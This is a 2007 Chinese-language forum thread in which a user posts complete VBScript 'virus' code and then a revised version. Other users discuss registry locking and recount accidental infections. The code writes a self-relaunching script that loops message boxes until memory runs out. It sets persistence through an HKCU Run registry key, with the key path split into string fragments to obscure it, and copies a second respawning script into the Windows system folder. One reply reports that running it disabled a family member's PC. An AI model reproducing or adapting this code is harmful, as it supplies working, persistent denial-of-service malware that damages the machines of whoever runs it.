标题: 病毒,VBS版
[打印本页]
作者: zhoushijay
时间: 2007-6-20 11:07
标题: 病毒,VBS版
set ws=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
a="HKEY_CURRE"
b="NT_USER\Softw"
c="are\Microsoft\Win"
d="dows\C"
e="urrentVersion\Run\5174"
f="C:\Documen"
g="ts and Settings\"
h="5174.vbs"
if fso.fileexists("C:\Documents and Settings\5174.vbs")=false then
set cr=fso.createtextfile("5174.vbs")
cr.write "do"&chr(13)&chr(10)&_
"set ws=createobject("&chr(34)&"wscript.shell"&chr(34)&")"&chr(13)&chr(10)&_
"ws.run "&chr(34)&"5174.vbs"&chr(34)&chr(13)&chr(10)&_
"msgbox "&chr(34)&"阿晓,我好脆弱,快点解决我吧 ^^"&chr(34)&chr(44)&chr(44)&chr(34)&"洪水泛滥啦!"&chr(34)&chr(13)&chr(10)&_
"loop"
cr.close
fso.movefile "5174.vbs",f&g
end if
ws.regwrite a&b&c&d&e,f&g&h
ws.run chr(34)&f&g&h&chr(34)
set ws=nothing
set fso=nothing
Last edited by zhoushijay on 2007-6-20 at 11:46 AM ]
作者: HAT
时间: 2007-6-20 12:13
//阿晓,我好脆弱,快点解决我吧 ^^
是不是写"病毒"的人都比较有幽默感?^^
//ws.regwrite a&b&c&d&e,f&g&h
假设注册表已经锁定,这句还能成功吗?不懂vbs :'(
作者: lxmxn
时间: 2007-6-20 12:27
在XP sp2下测试了一下,注册表锁定了还是可以写注册表的。
作者: zhoushijay
时间: 2007-6-20 13:21
发现了一个问题,从一个VBS文件启动另外一个VBS文件,另外一个VBS文件又要启动一个VBS文件,
VBS这样的传递做不到,有没有什么解决办法
还有,请问楼上注册表怎么锁定
作者: lxmxn
时间: 2007-6-20 13:48
我是写注册表键值DisableRegistryTools为1。
作者: zhoushijay
时间: 2007-6-20 14:14
修改了一下,上面的代码有错误,再增加一个自生功能(自生功能保存的文件名必须是23.vbs)
set ws=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
on error resume next
a="HKEY_CURRE"
b="NT_USER\Softw"
c="are\Microsoft\Win"
d="dows\C"
e="urrentVersion\Run\5174"
f="C:\WINDOWS\"
g="system\"
h="5174.vbs"
if fso.fileexists("C:\WINDOWS\5174.vbs")=false then
set cr=fso.createtextfile("5174.vbs")
cr.write "do"&chr(13)&chr(10)&_
"set ws=createobject("&chr(34)&"wscript.shell"&chr(34)&")"&chr(13)&chr(10)&_
"ws.run "&chr(34)&h&chr(34)&chr(13)&chr(10)&_
"msgbox "&chr(34)&"阿晓,我好脆弱,快点解决我吧 ^^"&chr(34)&chr(44)&chr(44)&chr(34)&"洪水泛滥啦!"&chr(34)&chr(13)&chr(10)&_
"loop"
cr.close
fso.movefile "5174.vbs",f
fso.copyfile "23.vbs",f&g
end if
ws.regdelete a&b&c&d&e
ws.regwrite a&b&c&d&e,f&h
ws.regwrite a&b&c&d&"urrentVersion\Run\23",f&g&"23.vbs"
set ws=nothing
set fso=nothing
Last edited by zhoushijay on 2007-6-20 at 02:16 PM ]
作者: slore
时间: 2007-6-20 18:57
Run的权限早设置了=。=C:\WINDOWS我也NTFS设置了权限=。=
VBS好好学些技巧好了,不要浪费精力到做这些事情上。。。
作者: 429499381
时间: 2007-8-9 00:19
我当时拿你的代码胡乱复制粘贴运行了一下, 只看见窗口闪了一下什么都没有出
现! 以为是我的2003企业版的系统不支持的原因, 也就没在意, 继续疯狂实
验其他的代码!! 后来第2天上班, 我弟弟(菜鸟)发了一条短信给我, 说:家里
的电脑中了VBS病毒, 不断出现窗口, 无法关闭, 直到内存为0。
我看了弟弟的描述基本明白怎么回事, 回家后问题很快解决!!
事后想想有点后怕, 我的硬盘里面有好几十G的资料!!!! 要
的。。。。。。。 恐怕我活不了, 上次也是胡乱实验XP的NTF
S加密和权限设置, 结果系统盘还原后其他盘的重要文件夹都无法访问, 怎
么实验也没有, 求助了好久, 试过了热心人的办法都无效, 最后还是忍痛
:P全盘格式化了
作者: knoppix7
时间: 2007-8-9 12:51
NTF
S加密和权限.....
同情。
用哪个什么替换子容器的什么什么东西就可以解决了。。。
作者: 429499381
时间: 2007-8-9 20:31
要的能的话, 我早就OK 了, 何必欲哭无泪
作者: meicnk
时间: 2007-8-27 11:31
xiexie .学习中